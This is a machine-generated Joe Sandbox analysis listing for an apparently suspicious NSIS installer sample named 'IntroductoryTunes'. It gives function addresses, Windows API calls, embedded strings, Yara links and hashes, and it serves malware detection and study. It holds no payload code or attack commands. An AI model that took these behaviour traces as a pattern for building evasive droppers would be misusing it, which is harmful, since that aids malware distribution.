Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNEL32(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
detailprint: %s, xrefs: 00401679
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Sleep(%d), xrefs: 0040169D
CreateDirectory: "%s" (%d), xrefs: 004017BF
Rename failed: %s, xrefs: 0040194B
CreateDirectory: "%s" created, xrefs: 00401849
BringToFront, xrefs: 004016BD
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
SetFileAttributes: "%s":%08X, xrefs: 0040177B
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
SetFileAttributes failed., xrefs: 004017A1
Rename on reboot: %s, xrefs: 00401943
Aborting: "%s", xrefs: 0040161D
Rename: %s, xrefs: 004018F8
Jump: %d, xrefs: 00401602
Call: %d, xrefs: 0040165A

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
ShowWindow.USER32(?), ref: 004054FE
DestroyWindow.USER32 ref: 00405512
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
GetDlgItem.USER32(?,?), ref: 0040554F
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
IsWindowEnabled.USER32(00000000), ref: 0040556A
GetDlgItem.USER32(?,00000001), ref: 00405619
GetDlgItem.USER32(?,00000002), ref: 00405623
KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 0040563D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
GetDlgItem.USER32(?,00000003), ref: 00405734
ShowWindow.USER32(00000000,?), ref: 00405756
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
EnableWindow.USER32(?,?), ref: 00405783
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
EnableMenuItem.USER32(00000000), ref: 004057A0
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
SetWindowTextW.USER32(?,00451D98), ref: 00405808
ShowWindow.USER32(?,0000000A), ref: 0040593C

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$CallbackDispatcherEnableMenuUser$DestroyEnabledLongSystemTextlstrlen
String ID:
API String ID: 3906175533-0
Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
RegisterClassW.USER32(00476A40), ref: 00405B36
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87

Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C

ShowWindow.USER32(00000005,00000000), ref: 00405BBD
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
RegisterClassW.USER32(00476A40), ref: 00405BFF
DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0040599E
_Nb, xrefs: 00405AFD
"F, xrefs: 00405A4B
@jG, xrefs: 00405AF2
RichEdit20A, xrefs: 00405BE2, 00405BE7
.exe, xrefs: 00405A69
RichEd20, xrefs: 00405BC9
RichEdit, xrefs: 00405BF0
.DEFAULT\Control Panel\International, xrefs: 004059C5
F, xrefs: 00405A22
RichEd32, xrefs: 00405BD4

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-2746725676
Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

lstrcatW.KERNEL32(00000000,00000000,FinePregnancyPossiblySleepingSurgeryMerger,004D70B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,FinePregnancyPossiblySleepingSurgeryMerger,FinePregnancyPossiblySleepingSurgeryMerger,00000000,00000000,FinePregnancyPossiblySleepingSurgeryMerger,004D70B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424976,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Strings

File: error, user retry, xrefs: 00401B40
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user abort, xrefs: 00401B53
File: error, user cancel, xrefs: 00401B93
File: wrote %d to "%s", xrefs: 00401BD0
FinePregnancyPossiblySleepingSurgeryMerger, xrefs: 00401A53, 00401A5C, 00401A69, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: error creating "%s", xrefs: 00401AF0

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$FinePregnancyPossiblySleepingSurgeryMerger
API String ID: 4286501637-3292815874
Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00424976,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

vIB, xrefs: 0040346F, 0040348A, 00403513
pAB, xrefs: 004033AB
... %d%%, xrefs: 004034C8
vB, xrefs: 00403458, 0040346A
(]C, xrefs: 004033FD

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$vB$vIB
API String ID: 651206458-2856346948
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

Inst, xrefs: 00403698
soft, xrefs: 004036A1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00424976,759223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424976,759223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424976,759223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
FinePregnancyPossiblySleepingSurgeryMerger, xrefs: 00402770

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
